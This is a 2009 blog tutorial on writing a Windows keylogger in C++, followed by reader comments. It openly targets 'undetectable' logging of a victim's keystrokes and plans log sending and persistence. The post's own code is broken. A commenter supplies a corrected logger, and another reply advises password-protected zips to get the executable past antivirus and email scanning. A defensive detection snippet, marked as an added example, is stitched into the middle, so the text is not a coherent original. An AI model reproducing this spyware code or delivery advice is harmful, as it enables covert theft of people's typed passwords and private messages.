Tuesday, May 5, 2009

Building a C++ Keylogger

Well, a lot of people have been asking me if there is such a thing as an undetectable keylogger, and after some quick searching I decided to code one myself. Here is the catch: first of all, I'm not going to give you the .exe, just the source; you can compile it yourself. Second of all, we are gonna do it one step at a time, one post at a time. But believe me, once we are through we will have a kickass keylogger.

Some features that we will go over:

- Sending logs via FTP
- Sending logs through email
- Running as a system process
- Running on startup
- Window titles and screenshots

What you will need:

- A basic knowledge of C++ (Very Basic)

- A compiler (I did these with Dev-C++)
Here's the link to download Dev-C++: http://www.bloodshed.net/dev/devcpp.html
Scroll to the bottom and there is the download link.

- 10-15 minutes
- A mouse click to subscribe to my blog!

Firstly, we have to understand the 2 basic types of keyloggers:
- Userland based loggers that capture the current state of the keyboard
- Keyboard hooks, filter drivers, or rootkits, that actually intercept the signals

For all intents and purposes, a well-coded hook can easily avoid detection, but well-coded is very hard to do and to explain, and you can understand it much better if we start with the userland loggers, which can be just as effective.

How these loggers work:

Windows conveniently provides a very nice API which is always undetectable because, well, it's used for just about anything, including keyloggers. The API is called GetAsyncKeyState(). A quick MSDN search reveals that this function takes one value, the vkey or virtual key, an ASCII decimal or hex value which represents the key. C++ also comes with some predefined values; for example, VK_SHIFT is the shift key, so you don't need the decimal value. Anyway, this function also returns whether or not the key is pressed down. Here's the MSDN link.

So, we can use GetAsyncKeyState to check whether a key is pressed down or not, but how does that help us log it? Well, you have to crawl before you can walk, so first let's add this to our code.


void Logger(){
int key;
GetAsyncKeyState(key);
}


Now's the fun part: if we can check if a key is pressed down, why don't we have the program check all the keys to see if they are pressed down? Then we will know which key to log. Sounds hard? Well, no, it's not, at least not if we use loops.




void Logger() {
char key[10];
while(true) {
Sleep(5);
for(key = 8; key <= 256; i++){
if(GetAsyncKeyState(key)==-32767){
StoreKey(key);
}
}
}
}




Let's analyze what this code does. First we start an endless while loop. Inside the loop there is a for loop which cycles through all the common ASCII values and checks if they are being pressed down. If they are, it stores this in a file with the StoreKey function, which we will write next. In addition, there is also a Sleep(5); to make sure that this doesn't take up 100% of the CPU and attract the victim's attention.
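From the defending side, the loop described above leaves a recognisable trace: one process calling GetAsyncKeyState across almost the whole virtual-key range every few milliseconds. The following is an added example, not part of the original post, of a heuristic that picks that sweep out of an API-call trace; the record layout, the thresholds and the sample data are assumptions constructed for illustration.

```cpp
#include <cstddef>
#include <cstdint>
#include <map>
#include <set>
#include <vector>

// One observed GetAsyncKeyState call (hypothetical API-monitor record layout).
struct KeyStateCall {
    uint32_t pid;      // calling process
    uint64_t time_ms;  // timestamp, milliseconds
    int vkey;          // virtual-key code passed to the API
};
struct Verdict { uint32_t pid; std::size_t calls; std::size_t distinct_keys; };

// Flags processes that, inside [start, start + window_ms), made at least
// min_calls calls spread over at least min_keys distinct key codes.
// Games and hotkey tools poll a few keys; sweeping the range is the logger pattern.
std::vector<Verdict> FindKeySweepers(const std::vector<KeyStateCall>& trace,
                                     uint64_t start, uint64_t window_ms,
                                     std::size_t min_calls, std::size_t min_keys) {
    std::map<uint32_t, std::size_t> calls;
    std::map<uint32_t, std::set<int>> keys;
    for (const KeyStateCall& c : trace) {
        if (c.time_ms < start || c.time_ms >= start + window_ms) continue;
        ++calls[c.pid];
        keys[c.pid].insert(c.vkey);
    }
    std::vector<Verdict> flagged;
    for (const auto& entry : calls) {
        std::size_t k = keys[entry.first].size();
        if (entry.second >= min_calls && k >= min_keys)
            flagged.push_back(Verdict{entry.first, entry.second, k});
    }
    return flagged;
}

// Constructed sample: pid 4242 sweeps codes 8..256 every 5 ms, as the loop in
// the post does; pid 1337 polls only W, A, S and D, as a game would.
std::vector<KeyStateCall> SampleTrace() {
    std::vector<KeyStateCall> t;
    for (uint64_t ms = 0; ms < 100; ms += 5) {
        for (int vk = 8; vk <= 256; ++vk) t.push_back(KeyStateCall{4242, ms, vk});
        for (int vk : {0x57, 0x41, 0x53, 0x44}) t.push_back(KeyStateCall{1337, ms, vk});
    }
    return t;
}
int main() {  // exit code 0 when exactly one process (4242) is flagged
    return FindKeySweepers(SampleTrace(), 0, 100, 1000, 100).size() == 1 ? 0 : 1;
}
```

On real telemetry the thresholds would be tuned against a baseline, since games and accessibility tools also call this API.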

Now for the store key function.



void StoreKey(char key){
ofstream storekey("C:\\storekey.txt", ios::app);
storekey << key;
storekey.close;
}


This function opens a new ofstream, storekey, that points to a file named storekey.txt on the C drive; it then logs the key to that file and closes the file.

Well, now for the complete code. If you liked this code and want more, remember to subscribe and comment! Come on guys, I need incentive to keep doing this.
THANKS

--------------------------------------------------------------------------------


#include <windows.h>
#include <fstream>

using namespace std;

void StoreKey(char key){
ofstream storekey("C:\\storekey.txt", ios::app);
storekey << key;
storekey.close;
}


void Logger() {
char key[10];
while(true) {
Sleep(5);
for(key = 8; key <= 256; i++){
if(GetAsyncKeyState(key)==-32767){
StoreKey(key);
}
}
}
}

int main(){
Logger();
return 1;
}


-----------------------------------------------------------------------------------------------

That's it, a simple keylogger. Make sure you subscribe so you catch the next post; it will teach you how to catch all the special characters and maybe even how to send your log to yourself O.o Read! Comment! Subscribe!

12 comments:

  1. I'm getting massive errors when I try to do this in Dev-C++ and I have no clue what's wrong with it... Apparently it can't resolve the address of overloaded function storekey.close, int and char[20] are incompatible? and a host of other issues...

  2. These tuts are awesome, would you be able to make a tut for sending the logged text through email?

  3. Awesome tut!

    May I ask what the -32767 means?

    And how to subscribe?

  4. really it's very nice tutorial

    I just want to ask about this : char key[10] !!
    why here we make array !!!

    and :

    for(key=8 ; key<=256 ; i++)

    why i++???

  5. This is the error log i get when i build it.

    -------------- Build: Debug in Keylogger Simple ---------------

    Compiling: main.cpp
    C:\CodeBlocks\WorkSpace\Keylogger Simple\main.cpp: In function 'void StoreKey(char)':
    C:\CodeBlocks\WorkSpace\Keylogger Simple\main.cpp:10: error: statement cannot resolve address of overloaded function
    C:\CodeBlocks\WorkSpace\Keylogger Simple\main.cpp: In function 'void Logger()':
    C:\CodeBlocks\WorkSpace\Keylogger Simple\main.cpp:18: error: incompatible types in assignment of 'int' to 'char [10]'
    C:\CodeBlocks\WorkSpace\Keylogger Simple\main.cpp:18: error: ISO C++ forbids comparison between pointer and integer
    C:\CodeBlocks\WorkSpace\Keylogger Simple\main.cpp:18: error: 'i' was not declared in this scope
    C:\CodeBlocks\WorkSpace\Keylogger Simple\main.cpp:19: error: invalid conversion from 'char*' to 'int'
    C:\CodeBlocks\WorkSpace\Keylogger Simple\main.cpp:19: error: initializing argument 1 of 'SHORT GetAsyncKeyState(int)'
    C:\CodeBlocks\WorkSpace\Keylogger Simple\main.cpp:20: error: invalid conversion from 'char*' to 'char'
    C:\CodeBlocks\WorkSpace\Keylogger Simple\main.cpp:20: error: initializing argument 1 of 'void StoreKey(char)'
    Process terminated with status 1 (0 minutes, 0 seconds)
    8 errors, 0 warnings

  6. Hey everyone, as you probably already found out, this code is horribly written (no offense to the author). So with that said, here is the code for a WORKING keylogger.

    NOTE: This keylogger has no stealth or email sender, it only logs the keys pressed to a file saved wherever you saved the project. So if you want to put it upon yourself to add those things feel free :P

    Enjoy :)

    #include
    using namespace std; /*lazy ftw*/
    #include /*to poll key states*/
    #include

    int Save (int key_stroke, char *file); /*Declares key_stroke and file*/

    int main()
    {
    char i;
    while (1)
    {
    for(i = 8; i <= 190; i++)
    {
    if (GetAsyncKeyState(i) == -32767)
    Save(i, "LOG.TXT"); /*saves keys to file named LOG.txt*/
    }
    }
    system ("PAUSE");
    return 0;
    }

    int Save (int key_stroke, char *file)
    {
    if ( (key_stroke ==1) || (key_stroke == 2))
    return 0;

    FILE *OUTPUT_FILE;
    OUTPUT_FILE = fopen(file, "a+");
    cout << key_stroke << endl;

    if (key_stroke == 8)
    fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]"); /* Logs the BACKSPACE key*/

    */Here is where you get to enter the rest of the code
    for the other special characters such as
    shift, space, etc.
    */

    else
    fprintf(OUTPUT_FILE, "%s", &key_stroke);

    fclose(OUTPUT_FILE); /*close output to the file*/
    return 0;
    }

  7. Wait... I use MS Visual C++ Express 2010 ... So I start a new project... WHICH CATEGORY SHOULD I START IN?? I'm a Newbie :) .... plz reply
    There is:
    Class Library, CLR Console App, CLR Empty Project, Windows Forms App, Win32 console app, win32 project, empty project, makefile project... plz reply fast

  8. I am receiving these errors.... plzzzz help me.....I am using borland c++ compiler.....

    Error: noname01.cpp(9,19):Member function must be called or its address taken
    Error: noname01.cpp(17,16):Lvalue required
    Error: noname01.cpp(17,26):Cannot convert 'int' to 'char *'
    Error: noname01.cpp(17,33):Undefined symbol 'i'
    Error: noname01.cpp(18,34):Cannot convert 'char *' to 'int'
    Error: noname01.cpp(18,34):Type mismatch in parameter 'vKey' in call to '__stdcall GetAsyncKeyState(int)'
    Error: noname01.cpp(19,23):Cannot convert 'char *' to 'char'
    Error: noname01.cpp(19,23):Type mismatch in parameter 'key' in call to 'StoreKey(char)'

  9. how to send this keylogger to others computer....thanks for the post

    Replies
    1. use a compressed zip folder.Use password protection that way anti virus or email server cannot stop your file from attaching.without password you cannot send a .exe file in zipped folder .
